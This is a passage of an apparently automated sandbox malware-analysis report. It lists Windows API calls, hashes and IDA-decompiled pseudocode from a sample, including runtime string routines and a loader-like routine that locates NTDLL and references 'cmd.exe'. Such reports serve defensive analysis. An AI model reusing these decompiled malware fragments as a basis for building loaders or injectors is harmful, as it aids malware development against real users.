        • Part of subcall function 0040CA26: TerminateProcess.KERNEL32(00000000,?,?,0040EEF7), ref: 0040CB06
      • GetStdHandle.KERNEL32(000000F4,00000001,00000001,00000000,76ECE046,00000003,0040EF61,000000FC,0040C732,00000001,00000000,00000000,?,004110A6,0040FA78,00000001), ref: 0040EEFE
      • _strlen.LIBCMT ref: 0040EF1F
      • WriteFile.KERNEL32 ref: 0040EF29
      Strings
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: AddressProc$_strlen$ExceptionFileFilterProcessUnhandled$CurrentDebuggerHandleLibraryLoadModuleNamePresentTerminateWrite
      • String ID: ,eC$...$1bC$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
      • API String ID: 4184918118-2450894920
      • Opcode ID: 7b871b0783c43e04a25583e1c512450dc56a31d9f09b1317cbc8e62b82cf6b72
      • Instruction ID: 462586cc789323171f2c72c096ec468ac0dd215f58db3d8e5dcc44e6501676fe
      • Opcode Fuzzy Hash: 7b871b0783c43e04a25583e1c512450dc56a31d9f09b1317cbc8e62b82cf6b72
      • Instruction Fuzzy Hash: 253137B26442197AE62033279C86BBF364C9B15358F15053BFC08B02D3EA7E996140EE
      C-Code - Quality: 86%
      			E00412B53(short* __ecx, int _a4, int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
      				signed int _v8;
      				int _v12;
      				int _v16;
      				int _v20;
      				intOrPtr _v24;
      				void* _v36;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				signed int _t110;
      				intOrPtr _t112;
      				intOrPtr _t113;
      				short* _t115;
      				short* _t116;
      				char* _t120;
      				short* _t121;
      				short* _t123;
      				short* _t127;
      				int _t128;
      				short* _t141;
      				signed int _t144;
      				void* _t146;
      				short* _t147;
      				signed int _t150;
      				short* _t153;
      				char* _t157;
      				int _t160;
      				long _t162;
      				signed int _t174;
      				signed int _t178;
      				signed int _t179;
      				int _t182;
      				signed int _t186;
      				signed int _t188;
      				short* _t189;
      				int _t191;
      				intOrPtr _t194;
      				int _t207;
      
      				_t110 =  *0x42c4a0; // 0xe190ffa3
      				_v8 = _t110 ^ _t188;
      				_t194 =  *0x436a04; // 0x1
      				_t184 = __ecx;
      				if(_t194 == 0) {
      					_t182 = 1;
      					if(LCMapStringW(0, 0x100, 0x418118, 1, 0, 0) == 0) {
      						_t162 = GetLastError();
      						__eflags = _t162 - 0x78;
      						if(_t162 == 0x78) {
      							 *0x436a04 = 2;
      						}
      					} else {
      						 *0x436a04 = 1;
      					}
      				}
      				if(_a16 <= 0) {
      					L13:
      					_t112 =  *0x436a04; // 0x1
      					if(_t112 == 2 || _t112 == 0) {
      						__eflags = _a4;
      						_v16 = 0;
      						_v20 = 0;
      						if(_a4 == 0) {
      							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
      						}
      						__eflags = _a28;
      						if(_a28 == 0) {
      							_a28 =  *((intOrPtr*)( *_t184 + 4));
      						}
      						_t113 = E004134B0(0, _t179, _t182, _t184, _a4);
      						__eflags = _t113 - 0xffffffff;
      						_v24 = _t113;
      						if(_t113 != 0xffffffff) {
      							__eflags = _t113 - _a28;
      							if(_t113 == _a28) {
      								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
      								L78:
      								__eflags = _v16;
      								if(__eflags != 0) {
      									_push(_v16);
      									E00410D1A(0, _t182, _t184, __eflags);
      								}
      								_t115 = _v20;
      								__eflags = _t115;
      								if(_t115 != 0) {
      									__eflags = _a20 - _t115;
      									if(__eflags != 0) {
      										_push(_t115);
      										E00410D1A(0, _t182, _t184, __eflags);
      									}
      								}
      								_t116 = _t184;
      								goto L84;
      							}
      							_t120 = E004134F7(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
      							_t191 =  &(_t189[0xc]);
      							__eflags = _t120;
      							_v16 = _t120;
      							if(_t120 == 0) {
      								goto L58;
      							}
      							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
      							__eflags = _t121;
      							_v12 = _t121;
      							if(__eflags != 0) {
      								if(__eflags <= 0) {
      									L71:
      									_t182 = 0;
      									__eflags = 0;
      									L72:
      									__eflags = _t182;
      									if(_t182 == 0) {
      										goto L62;
      									}
      									E0040FE20(_t182, _t182, 0, _v12);
      									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
      									__eflags = _t123;
      									_v12 = _t123;
      									if(_t123 != 0) {
      										_t186 = E004134F7(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
      										_v20 = _t186;
      										asm("sbb esi, esi");
      										_t184 =  ~_t186 & _v12;
      										__eflags = _t184;
      									} else {
      										_t184 = 0;
      									}
      									E0041083E(_t182);
      									goto L78;
      								}
      								__eflags = _t121 - 0xffffffe0;
      								if(_t121 > 0xffffffe0) {
      									goto L71;
      								}
      								_t127 =  &(_t121[4]);
      								__eflags = _t127 - 0x400;
      								if(_t127 > 0x400) {
      									_t128 = E0040C70A(0, _t179, _t182, LCMapStringA, _t127);
      									__eflags = _t128;
      									if(_t128 != 0) {
      										 *_t128 = 0xdddd;
      										_t128 = _t128 + 8;
      										__eflags = _t128;
      									}
      									_t182 = _t128;
      									goto L72;
      								}
      								E004136B0(_t127);
      								_t182 = _t191;
      								__eflags = _t182;
      								if(_t182 == 0) {
      									goto L62;
      								}
      								 *_t182 = 0xcccc;
      								_t182 = _t182 + 8;
      								goto L72;
      							}
      							L62:
      							_t184 = 0;
      							goto L78;
      						} else {
      							goto L58;
      						}
      					} else {
      						if(_t112 != 1) {
      							L58:
      							_t116 = 0;
      							L84:
      							return E0040FE9A(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
      						}
      						_v12 = 0;
      						if(_a28 == 0) {
      							_a28 =  *((intOrPtr*)( *_t184 + 4));
      						}
      						_t184 = MultiByteToWideChar;
      						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
      						_t207 = _t182;
      						if(_t207 == 0) {
      							goto L58;
      						} else {
      							if(_t207 <= 0) {
      								L28:
      								_v16 = 0;
      								L29:
      								if(_v16 == 0) {
      									goto L58;
      								}
      								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
      									L52:
      									E0041083E(_v16);
      									_t116 = _v12;
      									goto L84;
      								}
      								_t184 = LCMapStringW;
      								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
      								_v12 = _t174;
      								if(_t174 == 0) {
      									goto L52;
      								}
      								if((_a8 & 0x00000400) == 0) {
      									__eflags = _t174;
      									if(_t174 <= 0) {
      										L44:
      										_t184 = 0;
      										__eflags = 0;
      										L45:
      										__eflags = _t184;
      										if(_t184 != 0) {
      											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
      											__eflags = _t141;
      											if(_t141 != 0) {
      												__eflags = _a24;
      												_push(0);
      												_push(0);
      												if(_a24 != 0) {
      													_push(_a24);
      													_push(_a20);
      												} else {
      													_push(0);
      													_push(0);
      												}
      												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
      											}
      											E0041083E(_t184);
      										}
      										goto L52;
      									}
      									_t144 = 0xffffffe0;
      									_t179 = _t144 % _t174;
      									__eflags = _t144 / _t174 - 2;
      									if(_t144 / _t174 < 2) {
      										goto L44;
      									}
      									_t52 = _t174 + 8; // 0x8
      									_t146 = _t174 + _t52;
      									__eflags = _t146 - 0x400;
      									if(_t146 > 0x400) {
      										_t147 = E0040C70A(0, _t179, _t182, LCMapStringW, _t146);
      										__eflags = _t147;
      										if(_t147 != 0) {
      											 *_t147 = 0xdddd;
      											_t147 =  &(_t147[4]);
      											__eflags = _t147;
      										}
      										_t184 = _t147;
      										goto L45;
      									}
      									E004136B0(_t146);
      									_t184 = _t189;
      									__eflags = _t184;
      									if(_t184 == 0) {
      										goto L52;
      									}
      									 *_t184 = 0xcccc;
      									_t184 =  &(_t184[4]);
      									goto L45;
      								}
      								if(_a24 != 0 && _t174 <= _a24) {
      									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
      								}
      								goto L52;
      							}
      							_t150 = 0xffffffe0;
      							_t179 = _t150 % _t182;
      							if(_t150 / _t182 < 2) {
      								goto L28;
      							}
      							_t25 = _t182 + 8; // 0x8
      							_t152 = _t182 + _t25;
      							if(_t182 + _t25 > 0x400) {
      								_t153 = E0040C70A(0, _t179, _t182, MultiByteToWideChar, _t152);
      								__eflags = _t153;
      								if(_t153 == 0) {
      									L27:
      									_v16 = _t153;
      									goto L29;
      								}
      								 *_t153 = 0xdddd;
      								L26:
      								_t153 =  &(_t153[4]);
      								goto L27;
      							}
      							E004136B0(_t152);
      							_t153 = _t189;
      							if(_t153 == 0) {
      								goto L27;
      							}
      							 *_t153 = 0xcccc;
      							goto L26;
      						}
      					}
      				}
      				_t178 = _a16;
      				_t157 = _a12;
      				while(1) {
      					_t178 = _t178 - 1;
      					if( *_t157 == 0) {
      						break;
      					}
      					_t157 =  &(_t157[1]);
      					if(_t178 != 0) {
      						continue;
      					}
      					_t178 = _t178 | 0xffffffff;
      					break;
      				}
      				_t160 = _a16 - _t178 - 1;
      				if(_t160 < _a16) {
      					_t160 = _t160 + 1;
      				}
      				_a16 = _t160;
      				goto L13;
      			}










































      APIs
      • LCMapStringW.KERNEL32(00000000,00000100,00418118,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,00000001,00000000), ref: 00412B83
      • GetLastError.KERNEL32 ref: 00412B95
      • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,00000001,00000000), ref: 00412C21
      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 00412C8D
      • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 00412CA9
      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00412CE2
      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00412D46
      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 00412D69
        • Part of subcall function 004134B0: GetLocaleInfoA.KERNEL32(7FFFFFFF,00001004,00000000,00000006,00000000,7FFFFFFF,00000000,?,?,?,00410C10,01D31728,?,?), ref: 004134D2
      • LCMapStringA.KERNEL32 ref: 00412DF9
        • Part of subcall function 0040C70A: HeapAlloc.KERNEL32(00000000,-0000000E,00000001,00000000,00000000,?,004110A6,0040FA78,00000001,00000001,0040D3C9,00000018,00418C78,0000000C,0040D458,00000001), ref: 0040C782
      • LCMapStringA.KERNEL32 ref: 00412E6B
      • LCMapStringA.KERNEL32 ref: 00412EB8
        • Part of subcall function 0040FE9A: IsDebuggerPresent.KERNEL32 ref: 00412B08
        • Part of subcall function 0040FE9A: SetUnhandledExceptionFilter.KERNEL32 ref: 00412B1D
        • Part of subcall function 0040FE9A: UnhandledExceptionFilter.KERNEL32(fC), ref: 00412B28
        • Part of subcall function 0040FE9A: GetCurrentProcess.KERNEL32(C0000409), ref: 00412B44
        • Part of subcall function 0040FE9A: TerminateProcess.KERNEL32(00000000), ref: 00412B4B
        • Part of subcall function 00410D1A: HeapFree.KERNEL32(00000000,00000001,00418D60), ref: 00410D82
        • Part of subcall function 00410D1A: GetLastError.KERNEL32(?,0040D22C,00000004,00418C58,0000000C,004110EC,00000000,00000000,00000000,00000000,00000000,0040FA78,00000001,00000214), ref: 00410D93
        • Part of subcall function 004134F7: GetCPInfo.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,?,0041311E,00000001,?,00000000,?,?,?), ref: 00413540
        • Part of subcall function 004134F7: GetCPInfo.KERNEL32(?,00000001,?,0041311E,00000001,?), ref: 00413559
        • Part of subcall function 004134F7: _strlen.LIBCMT ref: 00413577
        • Part of subcall function 004134F7: MultiByteToWideChar.KERNEL32(?,00000001,?,0041311E,00000000,00000000,?,0041311E,00000001,?,00000000,?,?,?,?,00000000), ref: 004135B7
        • Part of subcall function 004134F7: MultiByteToWideChar.KERNEL32(?,00000001,?,0041311E,?,00000000,?,?,?,?,?,?,?,0041311E,00000001,?), ref: 00413606
        • Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,0041311E), ref: 00413621
        • Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,0041311E), ref: 00413647
        • Part of subcall function 004134F7: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,0041311E), ref: 0041366C
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ByteCharMultiWide$String$Info$ErrorExceptionFilterHeapLastProcessUnhandled$AllocCurrentDebuggerFreeLocalePresentTerminate_strlen
      • String ID:
      • API String ID: 2570851594-0
      • Opcode ID: 19bf860d114eb2898dda6a3995bf19210764c8e40c0971d6ad4241651fe780e5
      • Instruction ID: add9e604773e98e0779d4ea288a642ae63b3a42f9b82ecacdf1b385bd7247509
      • Opcode Fuzzy Hash: 19bf860d114eb2898dda6a3995bf19210764c8e40c0971d6ad4241651fe780e5
      • Instruction Fuzzy Hash: 77B17D7290010AAFCF219F94DE808EF7BB5FB08354B14452BF905E2260D7798DA1DBA9
      APIs
        • Part of subcall function 002D4111: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002D4160
        • Part of subcall function 002D3CEB: lstrlen.KERNEL32(00000000,00000000,002DA05C,00000027,?,?,00000000,00000000,?,002DA05C,00000000,00000000), ref: 002D3D21
        • Part of subcall function 002D3CEB: lstrcpy.KERNEL32(00000000,00000000), ref: 002D3D45
        • Part of subcall function 002D3CEB: lstrcat.KERNEL32(00000000,00000000), ref: 002D3D4D
        • Part of subcall function 002D3A46: CloseHandle.KERNEL32(00000000), ref: 002D3AF8
        • Part of subcall function 002D1882: memset.NTDLL ref: 002D18F8
        • Part of subcall function 002D1882: memcpy.NTDLL(00000000,00000000,?,?,?,00000000,?,002DA05C,00000000,00000000), ref: 002D190E
        • Part of subcall function 002D1882: memcpy.NTDLL(75F211F8,00000000,?,?,?,?,?,?,00000000,?,002DA05C,00000000,00000000), ref: 002D1942
      • CloseHandle.KERNEL32(?), ref: 002D1BA7
        • Part of subcall function 002D1538: HeapFree.KERNEL32(00000000,00000000,?), ref: 002D15A2
        • Part of subcall function 002D3D62: WaitForSingleObject.KERNEL32(00000000,?), ref: 002D3E3C
      • GetCurrentProcessId.KERNEL32(?,00000058,?,?,?,?,002DC65A,00000000,?,002DA05C,00000000,00000000), ref: 002D1A6F
      • OpenFileMappingW.KERNEL32(00000004,00000000,?), ref: 002D1A92
      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 002D1AA6
      • CloseHandle.KERNEL32(00000000), ref: 002D1AB3
      • lstrlenW.KERNEL32(00000000), ref: 002D1ABE
        • Part of subcall function 002D1000: RtlAllocateHeap.NTDLL(00000000,?,002D4CB5), ref: 002D100C
      • CreateEventA.KERNEL32(002DB25C,00000001,00000000,00000000,002DC767,00000001), ref: 002D1B38
        • Part of subcall function 002D1015: HeapFree.KERNEL32(00000000,?,002D46C4), ref: 002D1021
        • Part of subcall function 002D1348: memset.NTDLL ref: 002D1364
        • Part of subcall function 002D1348: GetLastError.KERNEL32 ref: 002D1399
      • WaitForSingleObject.KERNEL32(?,00007530), ref: 002D1B79
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Heap$CloseFreeHandle$FileObjectSingleWaitlstrlenmemcpymemset$AllocateCreateCurrentErrorEventLastMappingOpenProcessViewlstrcatlstrcpy
      • String ID: cmd.exe
      • API String ID: 2483582587-723907552
      • Opcode ID: 394d9d1fa885e21be980f15b46b7eaa39ae2def6e8366611ad9790346fac38fd
      • Instruction ID: 3b9d358a08dba1e82b849182d93e135a66e291b770f022dc258d602b82da5b9b
      • Opcode Fuzzy Hash: 394d9d1fa885e21be980f15b46b7eaa39ae2def6e8366611ad9790346fac38fd
      • Instruction Fuzzy Hash: C4615971D2120AFBDB10EFA0DD99AAEBBB8AF04345F10406BE545E3650EB749E60CB51
      C-Code - Quality: 100%
      			E0040247A(signed int _a4, intOrPtr* _a8, intOrPtr* _a12) {
      				intOrPtr _v0;
      				long _v4;
      				char _v8;
      				signed int _v12;
      				long _v20;
      				long _v24;
      				void* _t37;
      				intOrPtr* _t40;
      				intOrPtr* _t41;
      				char* _t42;
      				CHAR* _t48;
      				long _t52;
      				void* _t53;
      				void* _t55;
      
      				_v12 = 2;
      				E00401EFE(_a4, 0, 0,  &_v8);
      				_t52 = _v24;
      				_v20 = _t52;
      				_t55 = VirtualAlloc(0, _t52, 0x3000, 4);
      				if(_t55 == 0) {
      					L15:
      					_v12 = 8;
      					L16:
      					if(_t55 != 0) {
      						VirtualFree(_t55, 0, 0x8000);
      					}
      					return _v12;
      				} else {
      					goto L1;
      				}
      				while(1) {
      					L1:
      					_t37 = E00401EFE(_a4, _t55, _t52,  &_v8);
      					_t52 = _v24;
      					if(_t37 != 0 || _v4 >= _t52) {
      						break;
      					}
      					_v4 = _t52;
      					VirtualFree(_t55, 0, 0x8000);
      					_t55 = VirtualAlloc(0, _t52, 0x3000, 4);
      					if(_t55 != 0) {
      						continue;
      					}
      					break;
      				}
      				if(_t55 == 0 || _v4 < _t52) {
      					goto L15;
      				} else {
      					_a4 = _a4 & 0x00000000;
      					_t14 = _t55 + 8; // 0x8
      					_t53 = _t14;
      					if( *_t55 <= 0) {
      						goto L16;
      					}
      					while(1) {
      						_t48 = ( *(_t53 + 0x1e) & 0x0000ffff) + _t53 + 0x20;
      						if(lstrcmpiA(_t48, ?str?) == 0) {
      							break;
      						}
      						_t42 = StrChrA(_t48, 0x2e);
      						if(_t42 == 0) {
      							L11:
      							_t53 = _t53 + 0x120;
      							_v0 = _v0 + 1;
      							if(_v0 <  *_t55) {
      								continue;
      							}
      							goto L16;
      						}
      						 *_t42 = 0;
      						if(lstrcmpiA(_t48, ?str?) == 0) {
      							break;
      						}
      						goto L11;
      					}
      					_t40 = _a8;
      					_v12 = _v12 & 0x00000000;
      					 *_t40 =  *((intOrPtr*)(_t53 + 8));
      					 *((intOrPtr*)(_t40 + 4)) =  *((intOrPtr*)(_t53 + 0xc));
      					_t41 = _a12;
      					if(_t41 != 0) {
      						 *_t41 =  *((intOrPtr*)(_t53 + 0x10));
      					}
      					goto L16;
      				}
      			}

      APIs
        • Part of subcall function 00401EFE: GetProcAddress.KERNEL32(ZwWow64QueryInformationProcess64,00000318,00000000,00000000), ref: 00401F1C
        • Part of subcall function 00401EFE: StrRChrA.SHLWAPI(00000018,00000000,0000005C), ref: 004020A2
      • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 004024B3
      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,00000000), ref: 004024E9
      • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 004024F5
      • lstrcmpiA.KERNEL32(?,NTDLL.DLL,?,00000000,00000000,00000000), ref: 0040252C
      • StrChrA.SHLWAPI(?,0000002E), ref: 00402535
      • lstrcmpiA.KERNEL32(?,NTDLL.DLL), ref: 00402548
      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00402599
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Virtual$AllocFreelstrcmpi$AddressProc
      • String ID: NTDLL.DLL
      • API String ID: 1783538721-1613819793
      • Opcode ID: b6a3f740ebdcc39fdef97803f54a0bbce7d4c91b6f73e8fe06d467f6e6b62376
      • Instruction ID: 69a9618142ac30a13302b788f7181d4e7df1a241669798df9a30e95198f9b9aa
      • Opcode Fuzzy Hash: b6a3f740ebdcc39fdef97803f54a0bbce7d4c91b6f73e8fe06d467f6e6b62376
      • Instruction Fuzzy Hash: 06316271505311ABD3218F15DE49F1BBBE8EB88B54F11092AF944B72D0D7B8E904CBAE
      APIs
      • lstrlen.KERNEL32(@CODE@,00000000,?,00000000,002DA05C), ref: 002D13E9
      • RtlAllocateHeap.NTDLL(00000000,?), ref: 002D1419
      • memcpy.NTDLL(00000000,00000000,00000000), ref: 002D142B
      • memcpy.NTDLL(0000000B,00000000,00000000,00000000,00000000,00000000), ref: 002D143C
      • memcpy.NTDLL(00000000,00000000,?,0000000B,00000000,00000000,00000000,00000000,00000000), ref: 002D1456
      • HeapFree.KERNEL32(00000000,00000000), ref: 002D1467
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: memcpy$Heap$AllocateFreelstrlen
      • String ID: @CODE@$Fv
      • API String ID: 1753103609-962893422
      • Opcode ID: 10544f26649173e644cd73b6deb4b70a5fb1f1e327e8ee51c5cc0b9223b45aca
      • Instruction ID: 597d4196e8bf934d94d10985bdd840f4c5a6e179fdbc0872fafd0aab5fe72dce
      • Opcode Fuzzy Hash: 10544f26649173e644cd73b6deb4b70a5fb1f1e327e8ee51c5cc0b9223b45aca
      • Instruction Fuzzy Hash: 02318076A14249BFCB118FA9DC88B9EBFB9EF88314F14405AF844A7351C6719D24CB60
      C-Code - Quality: 93%
      			E00410859(int __ecx, int __edx, int _a4, int _a8, int _a12, char* _a16, int _a20, int _a24) {
      				signed int _v8;
      				char _v22;
      				struct _cpinfo _v28;
      				char* _v32;
      				signed int _v36;
      				char* _v40;
      				short* _v44;
      				int _v48;
      				void* _v60;
      				void* __ebx;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				signed int _t93;
      				int _t96;
      				int _t99;
      				short* _t113;
      				short* _t115;
      				short* _t118;
      				signed int _t121;
      				void* _t123;
      				short* _t124;
      				signed int _t126;
      				void* _t128;
      				short* _t129;
      				char* _t131;
      				char* _t134;
      				signed int _t136;
      				signed int _t139;
      				long _t144;
      				int _t145;
      				int _t149;
      				char _t159;
      				void* _t160;
      				signed int _t163;
      				signed int _t164;
      				short* _t168;
      				signed int _t170;
      				short* _t171;
      				void* _t175;
      
      				_t165 = __edx;
      				_t93 =  *0x42c4a0; // 0xe190ffa3
      				_v8 = _t93 ^ _t170;
      				_t168 = 0;
      				_t175 =  *0x436694 - _t168; // 0x0
      				_t145 = __edx;
      				_t169 = __ecx;
      				_v40 = __edx;
      				_v32 = _a16;
      				if(_t175 == 0) {
      					if(CompareStringW(0, 0, 0x418118, 1, 0x418118, 1) == 0) {
      						_t144 = GetLastError();
      						__eflags = _t144 - 0x78;
      						if(_t144 == 0x78) {
      							 *0x436694 = 2;
      						}
      					} else {
      						 *0x436694 = 1;
      					}
      				}
      				if(_a12 <= _t168) {
      					__eflags = _a12 - 0xffffffff;
      					if(_a12 >= 0xffffffff) {
      						L11:
      						_t165 = _a20;
      						if(_t165 <= _t168) {
      							__eflags = _t165 - 0xffffffff;
      							if(_t165 < 0xffffffff) {
      								goto L18;
      							}
      							L20:
      							_t149 =  *0x436694; // 0x0
      							if(_t149 == 2 || _t149 == _t168) {
      								_t168 = 0;
      								_t145 = 0;
      								__eflags = _a4;
      								if(_a4 == 0) {
      									_a4 =  *((intOrPtr*)( *_t169 + 0x14));
      								}
      								__eflags = _a24 - _t168;
      								if(_a24 == _t168) {
      									_a24 =  *((intOrPtr*)( *_t169 + 4));
      								}
      								_t169 = E004134B0(_t145, _t165, _t168, _t169, _a4);
      								__eflags = _t169 - 0xffffffff;
      								if(_t169 != 0xffffffff) {
      									__eflags = _t169 - _a24;
      									if(_t169 == _a24) {
      										L89:
      										_t99 = CompareStringA(_a4, _a8, _v40, _a12, _v32, _a20);
      										__eflags = _t145;
      										_t169 = _t99;
      										if(__eflags != 0) {
      											_push(_t145);
      											E00410D1A(_t145, _t168, _t169, __eflags);
      											_push(_t168);
      											E00410D1A(_t145, _t168, _t169, __eflags);
      										}
      										_t96 = _t169;
      										goto L92;
      									}
      									_t145 = E004134F7(_t165, _a24, _t169, _v40,  &_a12, 0, 0);
      									__eflags = _t145;
      									if(_t145 == 0) {
      										goto L18;
      									}
      									_t168 = E004134F7(_t165, _a24, _t169, _v32,  &_a20, 0, 0);
      									__eflags = _t168;
      									if(__eflags != 0) {
      										_v40 = _t145;
      										_v32 = _t168;
      										goto L89;
      									}
      									_push(_t145);
      									E00410D1A(_t145, _t168, _t169, __eflags);
      								}
      								goto L18;
      							} else {
      								_t96 = 1;
      								if(_t149 != 1) {
      									goto L18;
      								}
      								_v44 = _t168;
      								if(_a24 == _t168) {
      									_a24 =  *((intOrPtr*)( *_t169 + 4));
      								}
      								if(_a12 == _t168 || _t165 == _t168) {
      									if(_a12 != _t165) {
      										__eflags = _t165 - _t96;
      										if(_t165 > _t96) {
      											goto L92;
      										}
      										__eflags = _a12 - _t96;
      										if(_a12 <= _t96) {
      											_t113 = GetCPInfo(_a24,  &_v28);
      											__eflags = _t113;
      											if(_t113 == 0) {
      												goto L18;
      											}
      											__eflags = _a12 - _t168;
      											if(_a12 <= _t168) {
      												__eflags = _a20 - _t168;
      												if(_a20 <= _t168) {
      													goto L51;
      												}
      												__eflags = _v28 - 2;
      												if(_v28 >= 2) {
      													__eflags = _v22;
      													_t131 =  &_v22;
      													if(_v22 == 0) {
      														goto L44;
      													} else {
      														goto L46;
      													}
      													while(1) {
      														L46:
      														_t165 =  *((intOrPtr*)(_t131 + 1));
      														__eflags = _t165;
      														if(_t165 == 0) {
      															goto L44;
      														}
      														_t159 =  *_v32;
      														__eflags = _t159 -  *_t131;
      														if(_t159 <  *_t131) {
      															L49:
      															_t131 = _t131 + 2;
      															__eflags =  *_t131;
      															if( *_t131 != 0) {
      																continue;
      															}
      															goto L44;
      														}
      														__eflags = _t159 - _t165;
      														if(_t159 <= _t165) {
      															goto L28;
      														}
      														goto L49;
      													}
      												}
      												L44:
      												_t96 = 1;
      												goto L92;
      											}
      											__eflags = _v28 - 2;
      											if(_v28 < 2) {
      												goto L32;
      											}
      											__eflags = _v22;
      											_t134 =  &_v22;
      											if(_v22 == 0) {
      												goto L32;
      											} else {
      												goto L37;
      											}
      											while(1) {
      												L37:
      												_t165 =  *((intOrPtr*)(_t134 + 1));
      												__eflags = _t165;
      												if(_t165 == 0) {
      													goto L32;
      												}
      												_t160 =  *_t145;
      												__eflags = _t160 -  *_t134;
      												if(_t160 <  *_t134) {
      													L40:
      													_t134 = _t134 + 2;
      													__eflags =  *_t134;
      													if( *_t134 != 0) {
      														continue;
      													}
      													goto L32;
      												}
      												__eflags = _t160 - _t165;
      												if(_t160 <= _t165) {
      													goto L28;
      												}
      												goto L40;
      											}
      										}
      										L32:
      										_push(3);
      										L29:
      										_pop(_t96);
      										goto L92;
      									}
      									L28:
      									_push(2);
      									goto L29;
      								} else {
      									L51:
      									_t169 = MultiByteToWideChar;
      									_t145 = MultiByteToWideChar(_a24, 9, _t145, _a12, _t168, _t168);
      									__eflags = _t145 - _t168;
      									_v48 = _t145;
      									if(_t145 == _t168) {
      										goto L18;
      									}
      									__eflags = _t145;
      									_t168 = 0x400;
      									if(_t145 <= 0) {
      										L61:
      										_t43 =  &_v36;
      										 *_t43 = _v36 & 0x00000000;
      										__eflags =  *_t43;
      										L62:
      										__eflags = _v36;
      										if(_v36 == 0) {
      											goto L18;
      										}
      										_t115 = MultiByteToWideChar(_a24, 1, _v40, _a12, _v36, _t145);
      										__eflags = _t115;
      										if(_t115 == 0) {
      											L78:
      											E0041083E(_v36);
      											_t96 = _v44;
      											L92:
      											return E0040FE9A(_t96, _t145, _v8 ^ _t170, _t165, _t168, _t169);
      										}
      										_t145 = MultiByteToWideChar(_a24, 9, _v32, _a20, 0, 0);
      										__eflags = _t145;
      										if(__eflags == 0) {
      											goto L78;
      										}
      										if(__eflags <= 0) {
      											L73:
      											_t168 = 0;
      											__eflags = 0;
      											L74:
      											__eflags = _t168;
      											if(_t168 != 0) {
